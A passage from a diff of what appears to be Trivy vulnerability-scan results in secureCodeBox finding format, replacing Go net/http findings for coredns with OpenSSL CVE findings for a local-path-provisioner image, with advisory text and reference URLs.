"value": "https://security.netapp.com/advisory/ntap-20211223-0002/", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-27191.html", + "value": "https://ubuntu.com/security/notices/USN-5179-1", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-8008.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-42374", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": "1.1.1l-r0", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-3711", + "installedVersion": "1.1.1g-r0", + "packageName": "libcrypto1.1", + "references": [ + "http://www.openwall.com/lists/oss-security/2021/08/26/2", + "https://access.redhat.com/security/cve/CVE-2021-3711", + "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3711", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=59f5e75f3bced8fc0e130d72a3f582cf7b480b46", + "https://github.com/advisories/GHSA-5ww6-px42-wc85", + "https://lists.apache.org/thread.html/r18995de860f0e63635f3008fd2a6aca82394249476d21691e7c59c9e@%3Cdev.tomcat.apache.org%3E", + "https://lists.apache.org/thread.html/rad5d9f83f0d11fb3f8bb148d179b8a9ad7c6a17f18d70e5805a713d1@%3Cdev.tomcat.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3711", + "https://rustsec.org/advisories/RUSTSEC-2021-0097.html", + "https://security.gentoo.org/glsa/202209-02", + "https://security.gentoo.org/glsa/202210-02", + "https://security.netapp.com/advisory/ntap-20210827-0010/", + "https://security.netapp.com/advisory/ntap-20211022-0003/", + "https://ubuntu.com/security/notices/USN-5051-1", + "https://www.cve.org/CVERecord?id=CVE-2021-3711", + "https://www.debian.org/security/2021/dsa-4963", + "https://www.openssl.org/news/secadv/20210824.txt", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpujan2022.html", + "https://www.oracle.com/security-alerts/cpuoct2021.html", + "https://www.tenable.com/security/tns-2021-16", + "https://www.tenable.com/security/tns-2022-02", + ], + }, + "category": "Vulnerability", + "description": "In order to decrypt SM2 encrypted data an application is expected to call the API function EVP_PKEY_decrypt(). Typically an application will call this function twice. The first time, on entry, the "out" parameter can be NULL and, on exit, the "outlen" parameter is populated with the buffer size required to hold the decrypted plaintext. The application can then allocate a sufficiently sized buffer and call EVP_PKEY_decrypt() again, but this time passing a non-NULL value for the "out" parameter. A bug in the implementation of the SM2 decryption code means that the calculation of the buffer size required to hold the plaintext returned by the first call to EVP_PKEY_decrypt() can be smaller than the actual size required by the second call. This can lead to a buffer overflow when EVP_PKEY_decrypt() is called by the application a second time with a buffer that is too small. A malicious attacker who is able present SM2 content for decryption to an application could cause attacker chosen data to overflow the buffer by up to a maximum of 62 bytes altering the contents of other data held after the buffer, possibly changing application behaviour or causing the application to crash. The location of the buffer is application dependent but is typically heap allocated. Fixed in OpenSSL 1.1.1l (Affected 1.1.1-1.1.1k).", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "openssl: SM2 Decryption Buffer Overflow", + "references": [ { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", + "value": "https://avd.aquasec.com/nvd/cve-2021-3711", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EZ3S7LB65N54HXXBCB67P4TTOHTNPP5O/", + "value": "http://www.openwall.com/lists/oss-security/2021/08/26/2", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HHGBEGJ54DZZGTXFUQNS7ZIG3E624YAF/", + "value": "https://access.redhat.com/security/cve/CVE-2021-3711", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QTFOIDHQRGNI4P6LYN6ILH5G443RYYKB/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3711", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=59f5e75f3bced8fc0e130d72a3f582cf7b480b46", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YHYRQB7TRMHDB3NEHW5XBRG7PPMUTPGV/", + "value": "https://github.com/advisories/GHSA-5ww6-px42-wc85", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "value": "https://lists.apache.org/thread.html/r18995de860f0e63635f3008fd2a6aca82394249476d21691e7c59c9e@%3Cdev.tomcat.apache.org%3E", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFUNHFHQVJSADNH7EZ3B53CYDZVEEPBP/", + "value": "https://lists.apache.org/thread.html/rad5d9f83f0d11fb3f8bb148d179b8a9ad7c6a17f18d70e5805a713d1@%3Cdev.tomcat.apache.org%3E", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZQNPPQWSTP2IX7SHE6TS4SP4EVMI5EZK/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3711", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "value": "https://rustsec.org/advisories/RUSTSEC-2021-0097.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27191", + "value": "https://security.gentoo.org/glsa/202209-02", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2021-0356", + "value": "https://security.gentoo.org/glsa/202210-02", }, { "type": "URL", - "value": "https://raw.githubusercontent.com/golang/vulndb/df2d3d326300e2ae768f00351ffa96cc2c56cf54/reports/GO-2021-0356.yaml", + "value": "https://security.netapp.com/advisory/ntap-20210827-0010/", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220429-0002/", + "value": "https://security.netapp.com/advisory/ntap-20211022-0003/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-27191", + "value": "https://ubuntu.com/security/notices/USN-5051-1", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "0.0.0-20211209124913-491a49abca63", - "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2021-44716", - "installedVersion": "v0.0.0-20210614182718-04defd469f4e", - "packageName": "golang.org/x/net", - "references": [ - "https://access.redhat.com/security/cve/CVE-2021-44716", - "https://cert-portal.siemens.com/productcert/pdf/ssa-744259.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44716", - "https://github.com/advisories/GHSA-vc3p-29h2-gpcp", - "https://github.com/golang/go/commit/48d948963c5ce7add72af5665a871caff6c1d35a (go1.17.5)", - "https://github.com/golang/go/issues/50058", - "https://github.com/golang/net/commit/491a49abca63de5e07ef554052d180a1b5fe2d70", - "https://go.dev/cl/369794", - "https://go.dev/issue/50058", - "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", - "https://groups.google.com/g/golang-announce/c/hcmEScgc00k/m/ZWnOjeY4CQAJ", - "https://linux.oracle.com/cve/CVE-2021-44716.html", - "https://linux.oracle.com/errata/ELSA-2022-0001.html", - "https://lists.debian.org/debian-lts-announce/2022/01/msg00016.html", - "https://lists.debian.org/debian-lts-announce/2022/01/msg00017.html", - "https://lists.debian.org/debian-lts-announce/2023/04/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-44716", - "https://pkg.go.dev/vuln/GO-2022-0288", - "https://security.gentoo.org/glsa/202208-02", - "https://security.netapp.com/advisory/ntap-20220121-0002/", - "https://www.cve.org/CVERecord?id=CVE-2021-44716", - ], - }, - "category": "Vulnerability", - "description": "net/http in Go before 1.16.12 and 1.17.x before 1.17.5 allows uncontrolled memory consumption in the header canonicalization cache via HTTP/2 requests.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", - "mitigation": undefined, - "name": "golang: net/http: limit growth of header canonicalization cache", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-44716", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3711", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-44716", + "value": "https://www.debian.org/security/2021/dsa-4963", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-744259.pdf", + "value": "https://www.openssl.org/news/secadv/20210824.txt", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44716", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-vc3p-29h2-gpcp", + "value": "https://www.oracle.com/security-alerts/cpujan2022.html", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/48d948963c5ce7add72af5665a871caff6c1d35a (go1.17.5)", + "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/50058", + "value": "https://www.tenable.com/security/tns-2021-16", }, { "type": "URL", - "value": "https://github.com/golang/net/commit/491a49abca63de5e07ef554052d180a1b5fe2d70", + "value": "https://www.tenable.com/security/tns-2022-02", }, - { - "type": "URL", - "value": "https://go.dev/cl/369794", + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "1.1.1j-r0", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-23840", + "installedVersion": "1.1.1g-r0", + "packageName": "libcrypto1.1", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-23840", + "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23840", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6a51b9e1d0cf0bf8515f7201b68fb0a3482b3dc1", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9b1129239f3ebb1d1c98ce9ed41d5c9476c47cb2", + "https://github.com/advisories/GHSA-qgm6-9472-pwq7", + "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44846", + "https://kc.mcafee.com/corporate/index?page=content&id=SB10366", + "https://linux.oracle.com/cve/CVE-2021-23840.html", + "https://linux.oracle.com/errata/ELSA-2021-9561.html", + "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", + "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2021-23840", + "https://rustsec.org/advisories/RUSTSEC-2021-0057.html", + "https://security.gentoo.org/glsa/202103-03", + "https://security.netapp.com/advisory/ntap-20210219-0009/", + "https://ubuntu.com/security/notices/USN-4738-1", + "https://ubuntu.com/security/notices/USN-5088-1", + "https://www.cve.org/CVERecord?id=CVE-2021-23840", + "https://www.debian.org/security/2021/dsa-4855", + "https://www.openssl.org/news/secadv/20210216.txt", + "https://www.oracle.com//security-alerts/cpujul2021.html", + "https://www.oracle.com/security-alerts/cpuApr2021.html", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpujan2022.html", + "https://www.oracle.com/security-alerts/cpuoct2021.html", + "https://www.tenable.com/security/tns-2021-03", + "https://www.tenable.com/security/tns-2021-09", + "https://www.tenable.com/security/tns-2021-10", + ], + }, + "category": "Vulnerability", + "description": "Calls to EVP_CipherUpdate, EVP_EncryptUpdate and EVP_DecryptUpdate may overflow the output length argument in some cases where the input length is close to the maximum permissable length for an integer on the platform. In such cases the return value from the function call will be 1 (indicating success), but the output length value will be negative. This could cause applications to behave incorrectly or crash. OpenSSL versions 1.1.1i and below are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1j. OpenSSL versions 1.0.2x and below are affected by this issue. However OpenSSL 1.0.2 is out of support and no longer receiving public updates. Premium support customers of OpenSSL 1.0.2 should upgrade to 1.0.2y. Other users should upgrade to 1.1.1j. Fixed in OpenSSL 1.1.1j (Affected 1.1.1-1.1.1i). Fixed in OpenSSL 1.0.2y (Affected 1.0.2-1.0.2x).", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "openssl: integer overflow in CipherUpdate", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2021-23840", }, { "type": "URL", - "value": "https://go.dev/issue/50058", + "value": "https://access.redhat.com/security/cve/CVE-2021-23840", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/hcmEScgc00k/m/ZWnOjeY4CQAJ", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23840", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-44716.html", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6a51b9e1d0cf0bf8515f7201b68fb0a3482b3dc1", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-0001.html", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9b1129239f3ebb1d1c98ce9ed41d5c9476c47cb2", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/01/msg00016.html", + "value": "https://github.com/advisories/GHSA-qgm6-9472-pwq7", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/01/msg00017.html", + "value": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44846", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/04/msg00021.html", + "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10366", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-44716", + "value": "https://linux.oracle.com/cve/CVE-2021-23840.html", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0288", + "value": "https://linux.oracle.com/errata/ELSA-2021-9561.html", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202208-02", + "value": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220121-0002/", + "value": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-44716", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-23840", + }, + { + "type": "URL", + "value": "https://rustsec.org/advisories/RUSTSEC-2021-0057.html", + }, + { + "type": "URL", + "value": "https://security.gentoo.org/glsa/202103-03", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20210219-0009/", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-4738-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5088-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-23840", + }, + { + "type": "URL", + "value": "https://www.debian.org/security/2021/dsa-4855", + }, + { + "type": "URL", + "value": "https://www.openssl.org/news/secadv/20210216.txt", + }, + { + "type": "URL", + "value": "https://www.oracle.com//security-alerts/cpujul2021.html", + }, + { + "type": "URL", + "value": "https://www.oracle.com/security-alerts/cpuApr2021.html", + }, + { + "type": "URL", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + }, + { + "type": "URL", + "value": "https://www.oracle.com/security-alerts/cpujan2022.html", + }, + { + "type": "URL", + "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + }, + { + "type": "URL", + "value": "https://www.tenable.com/security/tns-2021-03", + }, + { + "type": "URL", + "value": "https://www.tenable.com/security/tns-2021-09", + }, + { + "type": "URL", + "value": "https://www.tenable.com/security/tns-2021-10", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.0.0-20220906165146-f3363e06e74c", - "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-27664", - "installedVersion": "v0.0.0-20210614182718-04defd469f4e", - "packageName": "golang.org/x/net", + "fixedVersion": "1.1.1k-r0", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-3450", + "installedVersion": "1.1.1g-r0", + "packageName": "libcrypto1.1", "references": [ - "https://access.redhat.com/errata/RHSA-2023:2357", - "https://access.redhat.com/security/cve/CVE-2022-27664", - "https://bugzilla.redhat.com/2107371", - "https://bugzilla.redhat.com/2107374", - "https://bugzilla.redhat.com/2107383", - "https://bugzilla.redhat.com/2107386", - "https://bugzilla.redhat.com/2107388", - "https://bugzilla.redhat.com/2113814", - "https://bugzilla.redhat.com/2124669", - "https://bugzilla.redhat.com/2132868", - "https://bugzilla.redhat.com/2132872", - "https://bugzilla.redhat.com/2161274", - "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", - "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", - "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", - "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", - "https://errata.almalinux.org/9/ALSA-2023-2357.html", - "https://errata.rockylinux.org/RLSA-2022:7129", - "https://github.com/advisories/GHSA-69cg-p879-7622", - "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", - "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", - "https://github.com/golang/go/issues/54658", - "https://go.dev/cl/428735", - "https://go.dev/issue/54658", - "https://groups.google.com/g/golang-announce", - "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", - "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", - "https://linux.oracle.com/cve/CVE-2022-27664.html", - "https://linux.oracle.com/errata/ELSA-2023-2802.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", - "https://pkg.go.dev/vuln/GO-2022-0969", - "https://security.gentoo.org/glsa/202209-26", - "https://security.netapp.com/advisory/ntap-20220923-0004/", - "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-27664", + "http://www.openwall.com/lists/oss-security/2021/03/27/1", + "http://www.openwall.com/lists/oss-security/2021/03/27/2", + "http://www.openwall.com/lists/oss-security/2021/03/28/3", + "http://www.openwall.com/lists/oss-security/2021/03/28/4", + "https://access.redhat.com/security/cve/CVE-2021-3450", + "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2a40b7bc7b94dd7de897a74571e7024f0cf0d63b", + "https://github.com/advisories/GHSA-8hfj-xrj2-pm22", + "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44845", + "https://kc.mcafee.com/corporate/index?page=content&id=SB10356", + "https://linux.oracle.com/cve/CVE-2021-3450.html", + "https://linux.oracle.com/errata/ELSA-2021-9151.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CCBFLLVQVILIVGZMBJL3IXZGKWQISYNP/", + "https://mta.openssl.org/pipermail/openssl-announce/2021-March/000198.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3450", + "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0013", + "https://rustsec.org/advisories/RUSTSEC-2021-0056.html", + "https://security.FreeBSD.org/advisories/FreeBSD-SA-21:07.openssl.asc", + "https://security.gentoo.org/glsa/202103-03", + "https://security.netapp.com/advisory/ntap-20210326-0006/", + "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-openssl-2021-GHY28dJd", + "https://www.cve.org/CVERecord?id=CVE-2021-3450", + "https://www.openssl.org/news/secadv/20210325.txt", + "https://www.oracle.com//security-alerts/cpujul2021.html", + "https://www.oracle.com/security-alerts/cpuApr2021.html", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpujul2022.html", + "https://www.oracle.com/security-alerts/cpuoct2021.html", + "https://www.tenable.com/security/tns-2021-05", + "https://www.tenable.com/security/tns-2021-08", + "https://www.tenable.com/security/tns-2021-09", ], }, "category": "Vulnerability", - "description": "In net/http in Go before 1.18.6 and 1.19.x before 1.19.1, attackers can cause a denial of service because an HTTP/2 connection can hang during closing if shutdown were preempted by a fatal error.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "description": "The X509_V_FLAG_X509_STRICT flag enables additional security checks of the certificates present in a certificate chain. It is not set by default. Starting from OpenSSL version 1.1.1h a check to disallow certificates in the chain that have explicitly encoded elliptic curve parameters was added as an additional strict check. An error in the implementation of this check meant that the result of a previous check to confirm that certificates in the chain are valid CA certificates was overwritten. This effectively bypasses the check that non-CA certificates must not be able to issue other certificates. If a "purpose" has been configured then there is a subsequent opportunity for checks that the certificate is a valid CA. All of the named "purpose" values implemented in libcrypto perform this check. Therefore, where a purpose is set the certificate chain will still be rejected even when the strict flag has been used. A purpose is set by default in libssl client and server certificate verification routines, but it can be overridden or removed by an application. In order to be affected, an application must explicitly set the X509_V_FLAG_X509_STRICT verification flag and either not set a purpose for the certificate verification or, in the case of TLS client or server applications, override the default purpose. OpenSSL versions 1.1.1h and newer are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1k. OpenSSL 1.0.2 is not impacted by this issue. Fixed in OpenSSL 1.1.1k (Affected 1.1.1h-1.1.1j).", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "handle server errors after sending GOAWAY", + "name": "openssl: CA certificate check bypass with X509_V_FLAG_X509_STRICT", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-27664", + "value": "https://avd.aquasec.com/nvd/cve-2021-3450", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2357", + "value": "http://www.openwall.com/lists/oss-security/2021/03/27/1", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-27664", + "value": "http://www.openwall.com/lists/oss-security/2021/03/27/2", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107371", + "value": "http://www.openwall.com/lists/oss-security/2021/03/28/3", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107374", + "value": "http://www.openwall.com/lists/oss-security/2021/03/28/4", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107383", + "value": "https://access.redhat.com/security/cve/CVE-2021-3450", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107386", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107388", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2a40b7bc7b94dd7de897a74571e7024f0cf0d63b", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2113814", + "value": "https://github.com/advisories/GHSA-8hfj-xrj2-pm22", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2124669", + "value": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44845", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2132868", + "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10356", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2132872", + "value": "https://linux.oracle.com/cve/CVE-2021-3450.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2161274", + "value": "https://linux.oracle.com/errata/ELSA-2021-9151.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CCBFLLVQVILIVGZMBJL3IXZGKWQISYNP/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", + "value": "https://mta.openssl.org/pipermail/openssl-announce/2021-March/000198.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3450", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", + "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0013", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", + "value": "https://rustsec.org/advisories/RUSTSEC-2021-0056.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", + "value": "https://security.FreeBSD.org/advisories/FreeBSD-SA-21:07.openssl.asc", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", + "value": "https://security.gentoo.org/glsa/202103-03", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", + "value": "https://security.netapp.com/advisory/ntap-20210326-0006/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", + "value": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-openssl-2021-GHY28dJd", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3450", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", + "value": "https://www.openssl.org/news/secadv/20210325.txt", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", + "value": "https://www.oracle.com//security-alerts/cpujul2021.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", + "value": "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", + "value": "https://www.oracle.com/security-alerts/cpujul2022.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", + "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", + "value": "https://www.tenable.com/security/tns-2021-05", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", + "value": "https://www.tenable.com/security/tns-2021-08", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2357.html", + "value": "https://www.tenable.com/security/tns-2021-09", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "1.1.1l-r0", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-3712", + "installedVersion": "1.1.1g-r0", + "packageName": "libcrypto1.1", + "references": [ + "http://www.openwall.com/lists/oss-security/2021/08/26/2", + 